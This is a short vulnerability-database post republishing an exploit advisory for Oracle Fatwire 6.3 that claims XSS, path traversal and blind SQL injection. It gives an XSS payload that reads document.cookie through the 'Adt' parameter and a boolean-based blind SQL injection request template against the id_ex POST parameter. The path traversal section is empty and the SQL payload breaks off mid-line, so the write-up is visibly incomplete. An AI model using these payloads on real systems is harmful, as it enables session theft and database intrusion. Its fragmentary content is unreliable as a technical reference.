Friday, July 30, 2021

Oracle Fatwire 6.3 Cross Site Scripting / SQL Injection

# Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities
# Date: 29/07/2021
# Exploit Author: J. Francisco Bolivar @Jfran_cbit
# Vendor Homepage:
# Version: 6.3
# Tested on: CentOS

1. Xss

Adt parameter is vulnerable to Xss:

src="a" onerror=alert(document.cookie);>

2. Path Traversal


3. Blind Sql injection

Host: IPaddress

pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=<SQL Injection>&command=XX

The vulnerable parameter is : id_ex (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=203 AND

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore